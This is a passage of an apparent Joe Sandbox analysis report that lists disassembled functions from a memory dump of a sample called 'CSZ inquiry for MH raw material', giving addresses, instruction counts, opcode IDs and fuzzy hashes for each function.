                                                • Opcode Fuzzy Hash: 23f8decfc9e584b4d7d8fc59ec412b89f20e0b8bff8903a084d267bb1893188e
                                                • Instruction Fuzzy Hash: 42F1C472E005269BDB29CE6CC5A05BEFBF5BF54210B194269D856EF380E734EE41CB90
                                                Function 01524A35 Relevance: .4, Instructions: 423COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                • Instruction ID: 8caeac54bddd4d27562c8eefbea2cf895931ac904d0af4c1d5c3b983668be45a
                                                • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                • Instruction Fuzzy Hash: 83F14172E0022A9BDF19CF99D590BAEBBF5BF45710F048529E905EF284E774D841CBA0
                                                Function 015B2F30 Relevance: .4, Instructions: 412COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dd086c6ddae00804a4f2d0592b44cf699c22e39399456857b64f407947607d6f
                                                • Instruction ID: 7d5ade80e011b029346c92619e348353ca82f4146d5f78e34c95a9b9b63093bb
                                                • Opcode Fuzzy Hash: dd086c6ddae00804a4f2d0592b44cf699c22e39399456857b64f407947607d6f
                                                • Instruction Fuzzy Hash: 6AE1D135A042869FDB25CFACD4817FEBBF1BF48310F18841AD496AF281D675A989CB50
                                                Function 0159892B Relevance: .4, Instructions: 386COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b12616084b57dc487b660da68a4ecef9db4801d62159fad8196d070af7b2587e
                                                • Instruction ID: 41873c6b16e154bd4b35635d2440092c1f264cabf9a5a183d9f17a0ee646d97f
                                                • Opcode Fuzzy Hash: b12616084b57dc487b660da68a4ecef9db4801d62159fad8196d070af7b2587e
                                                • Instruction Fuzzy Hash: 30D10371A0060E8BDF05CF68C841AFEB7F2BF89314F188169D955EB241E739E905CB61
                                                Function 015065D0 Relevance: .4, Instructions: 383COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ed324aa4679f641ccd2a2bfa834deec9cf11c49d8c348b9dbce1054357b4db93
                                                • Instruction ID: 0d9131402934a3a1194f830eb4b5ec7e6497d94cc01f9b4461374dd161f5dfe2
                                                • Opcode Fuzzy Hash: ed324aa4679f641ccd2a2bfa834deec9cf11c49d8c348b9dbce1054357b4db93
                                                • Instruction Fuzzy Hash: 83E19F71608342CFC716CF68C490A6EBBE0FF89314F15896DE9958B391EB31E915CB92
                                                Function 014F8397 Relevance: .4, Instructions: 380COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f1b6a0843d624c376336854b5ae087b8682506089133fd8aa38d62409e021c9a
                                                • Instruction ID: 4da0cf523f03bffc0f17ebd77fad5589ebb4159670ad380855193d7e0b875fd9
                                                • Opcode Fuzzy Hash: f1b6a0843d624c376336854b5ae087b8682506089133fd8aa38d62409e021c9a
                                                • Instruction Fuzzy Hash: 94D1B071A0060B9BDB14DF69C891ABF77E5BF54204F14462EEA16DF3A0E730E951CB60
                                                Function 0152C6E0 Relevance: .4, Instructions: 367COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 084681640b7418215a2f6a31a5785a4dff09216cff1726e7b5f3a314be399340
                                                • Instruction ID: 9199f73095a7d4b7a1a942392a56321e97e38802f8e8fa6e907d9e6c5e399d0b
                                                • Opcode Fuzzy Hash: 084681640b7418215a2f6a31a5785a4dff09216cff1726e7b5f3a314be399340
                                                • Instruction Fuzzy Hash: 2ED17037E041298BEB29CF9CC5453BDBBB5FB46310F18842AD946AF2C6C7B49941CB85
                                                Function 015138E0 Relevance: .3, Instructions: 349COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 15f7ebcc7d80aea7784e508e2aba21020b29fa95bd435d693020b52e53de08a3
                                                • Instruction ID: 4f1428009f2091816842bb384f87abaf03b93f18b67eb8efbb40b41b1f00dfb6
                                                • Opcode Fuzzy Hash: 15f7ebcc7d80aea7784e508e2aba21020b29fa95bd435d693020b52e53de08a3
                                                • Instruction Fuzzy Hash: F3E18A75A00205CFDB19CF59C890AAEBBF5FF48320F1581A9E956EB395D730EA41CB90
                                                Function 0151CFE0 Relevance: .3, Instructions: 345COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cd7cbb110e27f9e571f8367c5f90dc5357c72d4d555174489e8ec171883c6ef3
                                                • Instruction ID: 6d4f0ad017ae50906fcc88463ae2e0ffdf4ace5cf6d0c081fa46aa8cefbed67f
                                                • Opcode Fuzzy Hash: cd7cbb110e27f9e571f8367c5f90dc5357c72d4d555174489e8ec171883c6ef3
                                                • Instruction Fuzzy Hash: 18D1D731A4031A8FFB36DB98C898BAEB7B1BB85304F0540ADD9099F249D774AD85CF51
                                                Function 015D95C3 Relevance: .3, Instructions: 326COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5937641932c24a237b4e6e162a53d5b414ca7e5ee81d488ad8839bea39f7d265
                                                • Instruction ID: 5f45a5f3b8580d0ecf457915d6f65b39c3bbdb0948051ab2f22ce7863acc1e37
                                                • Opcode Fuzzy Hash: 5937641932c24a237b4e6e162a53d5b414ca7e5ee81d488ad8839bea39f7d265
                                                • Instruction Fuzzy Hash: 75B189B19101266FFB358B68DC55FFFB6ACFB44754F044299B919EA1C0DB709E808B60
                                                Function 01588243 Relevance: .3, Instructions: 322COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                • Instruction ID: 2aba304008bc9bdbe34d794c7a11a492e878ea9a2e7c8ae69b32b10c6db0ed6d
                                                • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                • Instruction Fuzzy Hash: A9B16475A00609AFDB24EF99C940EBFBBB5FF84304F94445DAA42BB791DA34E905CB10
                                                Function 01510535 Relevance: .3, Instructions: 300COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                • Instruction ID: 243f4d1f7b6c5cd0787226e025784f138a68fb112d530530868109f33b9356fa
                                                • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                • Instruction Fuzzy Hash: ADB1D431604646AFEB26DB68C850BBEBBFABF84310F150559E6529F385D730ED81CB90
                                                Function 015083C0 Relevance: .3, Instructions: 281COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b66d7fd3ae6294953e9237e759af3635fa80461131e97c0b39d538edacfcdfe7
                                                • Instruction ID: 598b303679440087f99f34381abffb56e621f6c17f14e205fbdd8b6e98085874
                                                • Opcode Fuzzy Hash: b66d7fd3ae6294953e9237e759af3635fa80461131e97c0b39d538edacfcdfe7
                                                • Instruction Fuzzy Hash: 15C167705083418FE765CF19C494BAFBBE9BF88304F44496DE9898B291E775E908CF92
                                                Function 014FC427 Relevance: .3, Instructions: 280COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4198b693acb82ab4b2331f0cbca23ef437f42286ffb38d9964dd017ce237468d
                                                • Instruction ID: ff39ca782b6c576554dc0d9459e8bdcd92cae19b379ea7e3ddadd5022cd1e30d
                                                • Opcode Fuzzy Hash: 4198b693acb82ab4b2331f0cbca23ef437f42286ffb38d9964dd017ce237468d
                                                • Instruction Fuzzy Hash: 72B17470A0026A8BDB64DF59C890BADB7B1FF44704F0485EED64ADB351EB709D86CB24
                                                Function 0152E5E7 Relevance: .3, Instructions: 278COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 157ef845c9a36e38f9bf58662a0beda5337a7fe00cf1e010b0998213a0ed1321
                                                • Instruction ID: a8a5c0254cc95cbca1c248967be45246696d2f85af1c13be57add6f3f71e08f9
                                                • Opcode Fuzzy Hash: 157ef845c9a36e38f9bf58662a0beda5337a7fe00cf1e010b0998213a0ed1321
                                                • Instruction Fuzzy Hash: 70A14732E006669FEB31DB58E855BAEBBB8FB42714F050116EA10AF2D0D774AD40CBD0
                                                Function 01540185 Relevance: .3, Instructions: 276COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6ff7846ce8ac95a1569c3fd794087d2d63dc55ef358a01a99515e67539c190c2
                                                • Instruction ID: 40407a68e16a3d57bd33403c818c65232a815d2f2d8f7d5ccfe4eaeb17f0cc86
                                                • Opcode Fuzzy Hash: 6ff7846ce8ac95a1569c3fd794087d2d63dc55ef358a01a99515e67539c190c2
                                                • Instruction Fuzzy Hash: ECA1BF70B006169BDB25DF69D991BAEB7B1FF44318F204529EB059F2C1DB34E811DBA0
                                                Function 015D4500 Relevance: .3, Instructions: 275COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1bf38e88e99af27ac670c25d8be9aa46d98a6ec52564cbd6f9b58697d128eadc
                                                • Instruction ID: 820477ce33f7416bc3f4aa0512586e6c91e6305e6c9bf7806094ac6300004eb7
                                                • Opcode Fuzzy Hash: 1bf38e88e99af27ac670c25d8be9aa46d98a6ec52564cbd6f9b58697d128eadc
                                                • Instruction Fuzzy Hash: FBA1CC72A10652EFD722DF18C980B6ABBE9FF88744F45092CE589DFA51D334E801CB91
                                                Function 015D2B57 Relevance: .3, Instructions: 266COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                • Instruction ID: 2a17511e97204639fb092566795ea0d2fbe16710fae92bbcbbdd0bd70389a74c
                                                • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                • Instruction Fuzzy Hash: D0B11771E0061ADFDF29DFADC880AADBBB5FF88310F148169E915AB354D730A945CB90
                                                Function 015860E0 Relevance: .3, Instructions: 264COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3cebd8a924cbf5beac7ba7bf4e4d4ce36ba619a75e229d452632e1715176d46b
                                                • Instruction ID: 0a4fd0f979523092ba79f62ef5b711bd72176d17f6a3b3b3d444183264040edc
                                                • Opcode Fuzzy Hash: 3cebd8a924cbf5beac7ba7bf4e4d4ce36ba619a75e229d452632e1715176d46b
                                                • Instruction Fuzzy Hash: 16919F71E00216AFDB15EFA8D884BAEBFB5BB49710F154169E611BF341DB34E9008BA0
                                                Function 0151E3F0 Relevance: .3, Instructions: 261COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 40765a1a3eb584a53e0c2a48eb61d8c5019a368776e56ac065ca145a1d48b5fd
                                                • Instruction ID: d21e537b794dbd3402381626c514cf4aae5adad5fc4260781e792e4f047dd29e
                                                • Opcode Fuzzy Hash: 40765a1a3eb584a53e0c2a48eb61d8c5019a368776e56ac065ca145a1d48b5fd
                                                • Instruction Fuzzy Hash: 17910031A006168FFB279B68C481B7EBBE5FB94714F068469ED059F288E774D901C7A1
                                                Function 01534750 Relevance: .3, Instructions: 251COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
                                                • Instruction ID: a3e2f3a7794bb1aa0adb69bd6f57e44d68e56a91370973c239f291d803385e38
                                                • Opcode Fuzzy Hash: 9a4050b41c6a135279948fe63c017d1f443f312da45434136b065312031d96b8
                                                • Instruction Fuzzy Hash: 22812C32A042968FDB224EACD8C226DFFA5FF92210F184A7AD5429F341C674DD46D791
                                                Function 0154DBF9 Relevance: .2, Instructions: 244COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
                                                • Instruction ID: fbae839b267c02e02c882bbd1febc46eee508ab242da890ca2c3c9ae03d800fa
                                                • Opcode Fuzzy Hash: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
                                                • Instruction Fuzzy Hash: 49913172610A068FE735CF6DC889666BBF0FF65328B148A19D5E6DF6A0C375E521CB00
                                                Function 015CF7B0 Relevance: .2, Instructions: 242COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6df7084bce695f1e3806c138dac636eab194221f43b758a2e438aa47f39e3fba
                                                • Instruction ID: 801b3253539f8ec006d741fe3ca48e6a8165506e69cce8ee50ab90a810ed84d6
                                                • Opcode Fuzzy Hash: 6df7084bce695f1e3806c138dac636eab194221f43b758a2e438aa47f39e3fba
                                                • Instruction Fuzzy Hash: E391C031A00216AFEB15CFA8C8807AFBBE2BF84710F15856EE955DF281D774E901CB90
                                                Function 015CF43F Relevance: .2, Instructions: 241COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 54ed2a2c00c972236ac3d38ca7e06b34b253d74334928580ce8acd10ffbdc341
                                                • Instruction ID: b588552bc1dee53043244b48f5666f8e855ebc3947fa2eab26a95b04e0a31586
                                                • Opcode Fuzzy Hash: 54ed2a2c00c972236ac3d38ca7e06b34b253d74334928580ce8acd10ffbdc341
                                                • Instruction Fuzzy Hash: 0291BE72A001159FDB18CF69C8906BEBBF2FF88310B1A866ED815DF295D634D945CB50
                                                Function 015C81CC Relevance: .2, Instructions: 232COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4692f1d4be8033a6883aaf9c0b46c4b6b8157e1ab353aad5e3b6152d9c8252df
                                                • Instruction ID: e25a3b5bca253473ff23a0c27d7a9debe2f8004299fda82a464fb6ea0217d0fd
                                                • Opcode Fuzzy Hash: 4692f1d4be8033a6883aaf9c0b46c4b6b8157e1ab353aad5e3b6152d9c8252df
                                                • Instruction Fuzzy Hash: 3E81B471E005169FCB14CFADC8845AEB7F2FF88A14B15462ED921EB290D774E951CB90
                                                Function 01510E59 Relevance: .2, Instructions: 231COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 780f6761b5bd4aa189ccfddca674b994bdc009ba7e7ec054f767f14cfa05d35d
                                                • Instruction ID: 91a36007e13e5232bf1362248849514ef7cf7b904a2b22dbd3ec4f6596f13346
                                                • Opcode Fuzzy Hash: 780f6761b5bd4aa189ccfddca674b994bdc009ba7e7ec054f767f14cfa05d35d
                                                • Instruction Fuzzy Hash: 1881B535A005199FEB16CF6DC8809AEBBF2FFC5250B248295F9549F389D730E981CB90
                                                Function 01556ACC Relevance: .2, Instructions: 226COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: df3a2e48e7e44778b52446d90f726487821ab52b12e8f52035dd8aa508f26f92
                                                • Instruction ID: 1f4df94eb8e9a7970be1e3779817408248073ad1e2653a9915af0ce6f653a730
                                                • Opcode Fuzzy Hash: df3a2e48e7e44778b52446d90f726487821ab52b12e8f52035dd8aa508f26f92
                                                • Instruction Fuzzy Hash: D081B471E006569FDB58CF69C850ABEBBF9FB48710F44852EE845DB640E734D940CBA4
                                                Function 015BE4F6 Relevance: .2, Instructions: 224COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 163206642c2a27d2078a59ad6a48ddcc2f7724722646e4e3de1a6120b8e85bbe
                                                • Instruction ID: fa5db11d953e099005c567800a0d7ec243b9b77e37bf6ccde125f9e4071be643
                                                • Opcode Fuzzy Hash: 163206642c2a27d2078a59ad6a48ddcc2f7724722646e4e3de1a6120b8e85bbe
                                                • Instruction Fuzzy Hash: CA817D76A002159BDB28CFA8C591AEDFBF1FF89310B19816AD816EF385D634DD41CB90
                                                Function 015CAB40 Relevance: .2, Instructions: 222COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                • Instruction ID: dccf4d6da52c9d5c16543cfee48b5a96c690412c6526886cb737d129442f0835
                                                • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                • Instruction Fuzzy Hash: C2816035A0020A9FDF19CF98C890AAEBBF6BF84714F14856DD9169F345EB74E901CB50
                                                Function 0153E284 Relevance: .2, Instructions: 212COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fb9840759e62c97a10282d280ce946b18d6f410667bfc23c00e1b7e68d783e93
                                                • Instruction ID: 45c81765de8e5479a074de7543ad5742262d55e7cfaecaf3e9d5cff6c6c9c453
                                                • Opcode Fuzzy Hash: fb9840759e62c97a10282d280ce946b18d6f410667bfc23c00e1b7e68d783e93
                                                • Instruction Fuzzy Hash: 4981637190060AEFDB26CFA9D881BEEBBF9FF88354F144429E555AB250D730AC45CB60
                                                Function 0152B950 Relevance: .2, Instructions: 209COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b0f4728ddc4c48331c5fac30079f71a5bab12e3c59308ce5ba077de61a6eb451
                                                • Instruction ID: d8296c61d8840c0bbeff5519b98f5d000254b248866556023ba99b007839f300
                                                • Opcode Fuzzy Hash: b0f4728ddc4c48331c5fac30079f71a5bab12e3c59308ce5ba077de61a6eb451
                                                • Instruction Fuzzy Hash: 4A7125363002618EE724CF2AC98173A77E2FB86705F54895DE996CF2C5C775E802CBA0
                                                Function 0151C640 Relevance: .2, Instructions: 206COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c4143f6a405a2abd6925126b1b7963f9e6ab8b4416161e5ededba9b5648dac91
                                                • Instruction ID: b8aba04c09566042b21454bd66c5a253530f6a60052bd03ba9372b2f636ea58d
                                                • Opcode Fuzzy Hash: c4143f6a405a2abd6925126b1b7963f9e6ab8b4416161e5ededba9b5648dac91
                                                • Instruction Fuzzy Hash: A071B9B58006299FDB268F58D9907BEBBF4FF68710F14451AE952AF354D371A804CBE0
                                                Function 015B47A0 Relevance: .2, Instructions: 202COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 323d9c7c3bce31558599cbd4201c3f100c859e065dae29796c11e6605c718808
                                                • Instruction ID: 2311904ec8f41bf0855d3ecade71c65d573e4751ac90b25f2eaea9eae4d90195
                                                • Opcode Fuzzy Hash: 323d9c7c3bce31558599cbd4201c3f100c859e065dae29796c11e6605c718808
                                                • Instruction Fuzzy Hash: C8717E70900245EFDB30DFA9DA80A9EBBF9FB90300F11815EE621EF29AD7719944DB54
                                                Function 0151260B Relevance: .2, Instructions: 201COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
